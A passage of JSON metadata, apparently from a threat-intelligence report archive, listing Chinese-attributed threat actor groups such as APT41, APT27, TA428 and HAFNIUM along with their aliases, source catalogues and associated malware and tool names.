"2f07a03f-eb1f-47c8-a8e9-a1a00f2ec253", "created_at": "2022-10-25T16:07:24.277669Z", "updated_at": "2026-04-10T02:00:04.919609Z", "deleted_at": null, "main_name": "TA428", "aliases": [ "Operation LagTime IT", "Operation StealthyTrident", "ThunderCats" ], "source_name": "ETDA:TA428", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "Agent.dhwf", "Albaniiutas", "BlueTraveller", "Chymine", "Cotx RAT", "CoughingDown", "Darkmoon", "Destroy RAT", "DestroyRAT", "Gen:Trojan.Heur.PT", "Kaba", "Korplug", "LuckyBack", "PhantomNet", "PlugX", "Poison Ivy", "RedDelta", "RoyalRoad", "SManager", "SPIVY", "Sogu", "TIGERPLUG", "TManger", "TVT", "Thoper", "Xamtrav", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "2704d770-43b4-4bc4-8a5a-05df87416848", "created_at": "2022-10-25T15:50:23.306305Z", "updated_at": "2026-04-10T02:00:05.296581Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "HAFNIUM", "Operation Exchange Marauder", "Silk Typhoon" ], "source_name": "MITRE:HAFNIUM", "tools": [ "Tarrask", "ASPXSpy", "Impacket", "PsExec", "China Chopper" ], "source_id": "MITRE", "reports": null }, { "id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c", "created_at": "2022-10-25T15:50:23.819113Z", "updated_at": "2026-04-10T02:00:05.354598Z", "deleted_at": null, "main_name": "Threat Group-3390", "aliases": [ "Threat Group-3390", "Earth Smilodon", "TG-3390", "Emissary Panda", "BRONZE UNION", "APT27", "Iron Tiger", "LuckyMouse", "Linen Typhoon" ], "source_name": "MITRE:Threat Group-3390", "tools": [ "Systeminfo", "gsecdump", "PlugX", "ASPXSpy", "Cobalt Strike", "Mimikatz", "Impacket", "gh0st RAT", "certutil", "China Chopper", "HTTPBrowser", "Tasklist", "netstat", "SysUpdate", "HyperBro", "ZxShell", "RCSession", "ipconfig", "Clambling", "pwdump", "NBTscan", "Pandora", "Windows Credential Editor" ], "source_id": "MITRE", "reports": null }, { "id": "61ea51ed-a419-4b05-9241-5ab0dbba25fc", "created_at": "2023-01-06T13:46:38.354607Z", "updated_at": "2026-04-10T02:00:02.939761Z", "deleted_at": null, "main_name": "APT23", "aliases": [ "BRONZE HOBART", "G0081", "Red Orthrus", "Earth Centaur", "PIRATE PANDA", "KeyBoy", "Tropic Trooper" ], "source_name": "MISPGALAXY:APT23", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "17d16126-35d7-4c59-88a5-0b48e755e80f", "created_at": "2025-08-07T02:03:24.622109Z", "updated_at": "2026-04-10T02:00:03.726126Z", "deleted_at": null, "main_name": "BRONZE HUNTLEY", "aliases": [ "CactusPete ", "Earth Akhlut ", "Karma Panda ", "Red Beifang", "Tonto Team" ], "source_name": "Secureworks:BRONZE HUNTLEY", "tools": [ "Bisonal", "RatN", "Royal Road", "ShadowPad" ], "source_id": "Secureworks", "reports": null }, { "id": "bef7800a-a08f-4e21-b65c-4279c851e572", "created_at": "2022-10-25T15:50:23.409336Z", "updated_at": "2026-04-10T02:00:05.319608Z", "deleted_at": null, "main_name": "Tropic Trooper", "aliases": [ "Tropic Trooper", "Pirate Panda", "KeyBoy" ], "source_name": "MITRE:Tropic Trooper", "tools": [ "USBferry", "ShadowPad", "PoisonIvy", "BITSAdmin", "YAHOYAH", "KeyBoy" ], "source_id": "MITRE", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "3c7097f4-849b-4bc0-a7e6-ba2b510722b6", "created_at": "2022-10-25T16:07:23.869951Z", "updated_at": "2026-04-10T02:00:04.766204Z", "deleted_at": null, "main_name": "Mikroceen", "aliases": [ "SixLittleMonkeys" ], "source_name": "ETDA:Mikroceen", "tools": [ "AngryRebel", "Farfli", "Gh0st RAT", "Ghost RAT", "Microcin", "Mikroceen", "Mimikatz", "Moudour", "Mydoor", "PCRat", "logon.dll", "logsupport.dll", "pcaudit.bat", "sqllauncher.dll" ], "source_id": "ETDA", "reports": null }, { "id": "5d9dfc61-6138-497a-b9da-33885539f19c", "created_at": "2022-10-25T16:07:23.720008Z", "updated_at": "2026-04-10T02:00:04.726002Z", "deleted_at": null, "main_name": "Icefog", "aliases": [ "ATK 23", "Dagger Panda", "Icefog", "Red Wendigo" ], "source_name": "ETDA:Icefog", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "Dagger Three", "Fucobha", "Icefog", "Javafog", "POISONPLUG.SHADOW", "RoyalRoad", "ShadowPad Winnti", "XShellGhost" ], "source_id": "ETDA", "reports": null }, { "id": "6e79c98d-c678-4f28-b869-5723a78e71f4", "created_at": "2023-01-06T13:46:39.422441Z", "updated_at": "2026-04-10T02:00:03.322083Z", "deleted_at": null, "main_name": "Vicious Panda", "aliases": [ "SixLittleMonkeys" ], "source_name": "MISPGALAXY:Vicious Panda", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "945a572f-ebe3-4e2f-a288-512fe751cfa8", "created_at": "2022-10-25T16:07:24.413971Z", "updated_at": "2026-04-10T02:00:04.97924Z", "deleted_at": null, "main_name": "Winnti Group", "aliases": [ "G0044", "Leopard Typhoon", "Wicked Panda", "Winnti Group" ], "source_name": "ETDA:Winnti Group", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "FunnySwitch", "RbDoor", "RibDoor", "RouterGod", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "c39b0fe6-5642-4717-9a05-9e94265e3e3a", "created_at": "2022-10-25T16:07:24.332084Z", "updated_at": "2026-04-10T02:00:04.940672Z", "deleted_at": null, "main_name": "Tonto Team", "aliases": [ "Bronze Huntley", "CactusPete", "Earth Akhlut", "G0131", "HartBeat", "Karma Panda", "LoneRanger", "Operation Bitter Biscuit", "TAG-74", "Tonto Team" ], "source_name": "ETDA:Tonto Team", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "Bioazih", "Bisonal", "CONIME", "Dexbia", "Korlia", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "POISONPLUG.SHADOW", "RoyalRoad", "ShadowPad Winnti", "XShellGhost" ], "source_id": "ETDA", "reports": null }, { "id": "54e55585-1025-49d2-9de8-90fc7a631f45", "created_at": "2025-08-07T02:03:24.563488Z", "updated_at": "2026-04-10T02:00:03.715427Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "CTG-2006 ", "Daserf", "Stalker Panda ", "Swirl Typhoon ", "Tick " ], "source_name": "Secureworks:BRONZE BUTLER", "tools": [ "ABK", "BBK", "Casper", "DGet", "Daserf", "Datper", "Ghostdown", "Gofarer", "MSGet", "Mimikatz", "Netboy", "RarStar", "Screen Capture Tool", "ShadowPad", "ShadowPy", "T-SMB", "down_new", "gsecdump" ], "source_id": "Secureworks", "reports": null }, { "id": "20b5fa2f-2ef1-4e69-8275-25927a762f72", "created_at": "2025-08-07T02:03:24.573647Z", "updated_at": "2026-04-10T02:00:03.765721Z", "deleted_at": null, "main_name": "BRONZE DUDLEY", "aliases": [ "TA428 ", "Temp.Hex ", "Vicious Panda " ], "source_name": "Secureworks:BRONZE DUDLEY", "tools": [ "NCCTrojan", "PhantomNet", "PoisonIvy", "Royal Road" ], "source_id": "Secureworks", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "c63ab035-f9f2-4723-959b-97a7b98b5942", "created_at": "2023-01-06T13:46:38.298354Z", "updated_at": "2026-04-10T02:00:02.917311Z", "deleted_at": null, "main_name": "APT27", "aliases": [ "BRONZE UNION", "Circle Typhoon", "Linen Typhoon", "TEMP.Hippo", "Budworm", "Lucky Mouse", "G0027", "GreedyTaotie", "Red Phoenix", "Iron Tiger", "Iron Taurus", "Earth Smilodon", "TG-3390", "EMISSARY PANDA", "Group 35", "ZipToken" ], "source_name": "MISPGALAXY:APT27", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "578f8e62-2bb4-4ce4-a8b7-6c868fa29724", "created_at": "2022-10-25T16:07:24.344358Z", "updated_at": "2026-04-10T02:00:04.947834Z", "deleted_at": null, "main_name": "Tropic Trooper", "aliases": [ "APT 23", "Bronze Hobart", "Earth Centaur", "G0081", "KeyBoy", "Operation Tropic Trooper", "Pirate Panda", "Tropic Trooper" ], "source_name": "ETDA:Tropic Trooper", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "ByPassGodzilla", "CHINACHOPPER", "CREDRIVER", "China Chopper", "Chymine", "Darkmoon", "Gen:Trojan.Heur.PT", "KeyBoy", "Neo-reGeorg", "PCShare", "POISONPLUG.SHADOW", "Poison Ivy", "RoyalRoad", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Swor", "TSSL", "USBferry", "W32/Seeav", "Winsloader", "XShellGhost", "Yahoyah", "fscan", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "a4aca3ca-9e04-42d1-b037-f7fb3fbab0b1", "created_at": "2023-01-06T13:46:39.042499Z", "updated_at": "2026-04-10T02:00:03.194713Z", "deleted_at": null, "main_name": "TA428", "aliases": [ "BRONZE DUDLEY", "Colourful Panda" ], "source_name": "MISPGALAXY:TA428", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3c5b0e7e-2388-4b63-9b97-6b027bec4bf7", "created_at": "2023-01-06T13:46:39.068694Z", "updated_at": "2026-04-10T02:00:03.202867Z", "deleted_at": null, "main_name": "Calypso", "aliases": [ "BRONZE MEDLEY" ], "source_name": "MISPGALAXY:Calypso", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "60d96824-1767-4b97-a6c7-7e9527458007", "created_at": "2023-01-06T13:46:39.378701Z", "updated_at": "2026-04-10T02:00:03.307846Z", "deleted_at": null, "main_name": "ToddyCat", "aliases": [ "Websiic" ], "source_name": "MISPGALAXY:ToddyCat", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "86182dd7-646c-49c5-91a6-4b62fd2119a7", "created_at": "2025-08-07T02:03:24.617638Z", "updated_at": "2026-04-10T02:00:03.738499Z", "deleted_at": null, "main_name": "BRONZE HOBART", "aliases": [ "APT23", "Earth Centaur ", "KeyBoy ", "Pirate Panda ", "Red Orthrus ", "TA413 ", "Tropic Trooper " ], "source_name": "Secureworks:BRONZE HOBART", "tools": [ "Crowdoor", "DSNGInstaller", "KeyBoy", "LOWZERO", "Mofu", "Pfine", "Sepulcher", "Xiangoop Loader", "Yahaoyah" ], "source_id": "Secureworks", "reports": null }, { "id": "bf6cb670-bb69-473f-a220-97ac713fd081", "created_at": "2022-10-25T16:07:23.395205Z", "updated_at": "2026-04-10T02:00:04.578924Z", "deleted_at": null, "main_name": "Bitter", "aliases": [ "G1002", "T-APT-17", "TA397" ], "source_name": "ETDA:Bitter", "tools": [ "Artra Downloader", "ArtraDownloader", "Bitter RAT", "BitterRAT", "Dracarys" ], "source_id": "ETDA", "reports": null }, { "id": "13d9c5fc-af82-4474-90dd-188c4e40a399", "created_at": "2022-10-25T16:07:23.435079Z", "updated_at": "2026-04-10T02:00:04.601572Z", "deleted_at": null, "main_name": "Calypso", "aliases": [ "Bronze Medley" ], "source_name": "ETDA:Calypso", "tools": [ "Agent.dhwf", "Byeby", "Calypso RAT", "DCSync", "Destroy RAT", "DestroyRAT", "DoublePulsar", "EternalBlue", "EternalRomance", "FlyingDutchman", "Kaba", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "NBTscan", "OS_Check_445", "PlugX", "Quarks PwDump", "RedDelta", "SAMRID", "Sogu", "SysInternals", "TCP Port Scanner", "TIGERPLUG", "TVT", "Thoper", "Whitebird", "Xamtrav", "ZXPortMap", "nbtscan", "netcat" ], "source_id": "ETDA", "reports": null }, { "id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43", "created_at": "2025-08-07T02:03:24.68371Z", "updated_at": "2026-04-10T02:00:03.64323Z", "deleted_at": null, "main_name": "BRONZE UNION", "aliases": [ "APT27 ", "Bowser", "Budworm ", "Circle Typhoon ", "Emissary Panda ", "Group35", "Iron Tiger ", "Linen Typhoon ", "Lucky Mouse ", "TG-3390 ", "Temp.Hippo " ], "source_name": "Secureworks:BRONZE UNION", "tools": [ "AbcShell", "China Chopper", "EAGERBEE", "Gh0st RAT", "OwaAuth", "PhantomNet", "PoisonIvy", "Sysupdate", "Wonknu", "Wrapikatz", "ZxShell", "reGeorg" ], "source_id": "Secureworks", "reports": null }, { "id": "529c1ae9-4579-4245-86a6-20f4563a695d", "created_at": "2022-10-25T16:07:23.702006Z", "updated_at": "2026-04-10T02:00:04.71708Z", "deleted_at": null, "main_name": "Hafnium", "aliases": [ "G0125", "Murky Panda", "Red Dev 13", "Silk Typhoon" ], "source_name": "ETDA:Hafnium", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "5c13338b-eaed-429a-9437-f5015aa98276", "created_at": "2022-10-25T16:07:23.582715Z", "updated_at": "2026-04-10T02:00:04.675765Z", "deleted_at": null, "main_name": "Emissary Panda", "aliases": [ "APT 27", "ATK 15", "Bronze Union", "Budworm", "Circle Typhoon", "Earth Smilodon", "Emissary Panda", "G0027", "Group 35", "Iron Taurus", "Iron Tiger", "Linen Typhoon", "LuckyMouse", "Operation DRBControl", "Operation Iron Tiger", "Operation PZChao", "Operation SpoiledLegacy", "Operation StealthyTrident", "Red Phoenix", "TEMP.Hippo", "TG-3390", "ZipToken" ], "source_name": "ETDA:Emissary Panda", "tools": [ "ASPXSpy", "ASPXTool", "Agent.dhwf", "AngryRebel", "Antak", "CHINACHOPPER", "China Chopper", "Destroy RAT", "DestroyRAT", "FOCUSFJORD", "Farfli", "Gh0st RAT", "Ghost RAT", "HTTPBrowser", "HTran", "HUC Packet Transmit Tool", "HighShell", "HttpBrowser RAT", "HttpDump", "HyperBro", "HyperSSL", "HyperShell", "Kaba", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "Moudour", "Mydoor", "Nishang", "OwaAuth", "PCRat", "PlugX", "ProcDump", "PsExec", "RedDelta", "SEASHARPEE", "Sensocode", "SinoChopper", "Sogu", "SysUpdate", "TIGERPLUG", "TVT", "Thoper", "Token Control", "TokenControl", "TwoFace", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "Xamtrav", "ZXShell", "gsecdump", "luckyowa" ], "source_id": "ETDA", "reports": null }, { "id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b", "created_at": "2022-10-25T16:07:23.419513Z", "updated_at": "2026-04-10T02:00:04.591062Z", "deleted_at": null, "main_name": "Bronze Butler", "aliases": [ "Bronze Butler", "CTG-2006", "G0060", "Operation ENDTRADE", "RedBaldNight", "Stalker Panda", "Stalker Taurus", "Swirl Typhoon", "TEMP.Tick", "Tick" ], "source_name": "ETDA:Bronze Butler", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "9002 RAT", "AngryRebel", "Blogspot", "Daserf", "Datper", "Elirks", "Farfli", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "HomamDownloader", "Homux", "Hydraq", "Lilith", "Lilith RAT", "McRAT", "MdmBot", "Mimikatz", "Minzen", "Moudour", "Muirim", "Mydoor", "Nioupale", "PCRat", "POISONPLUG.SHADOW", "Roarur", "RoyalRoad", "ShadowPad Winnti", "ShadowWali", "ShadowWalker", "SymonLoader", "WCE", "Wali", "Windows Credential Editor", "Windows Credentials Editor", "XShellGhost", "XXMM", "gsecdump", "rarstar" ], "source_id": "ETDA", "reports": null }, { "id": "236429ce-6355-43f6-9b58-e6803a1df3f4", "created_at": "2026-03-16T02:02:50.60344Z", "updated_at": "2026-04-10T02:00:03.641587Z", "deleted_at": null, "main_name": "Bronze Union", "aliases": [ "Circle Typhoon ", "Emissary Panda " ], "source_name": "Secureworks:Bronze Union", "tools": [ "China Chopper", "OwaAuth", "Sysupdate" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434000, "ts_updated_at": 1775792241, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/fac1b6bd2567479aaa03a7dde4069bb2f4470bfb.pdf", "text": "https://archive.orkl.eu/fac1b6bd2567479aaa03a7dde4069bb2f4470bfb.txt", "img": "https://archive.orkl.eu/fac1b6bd2567479aaa03a7dde4069bb2f4470bfb.jpg" } }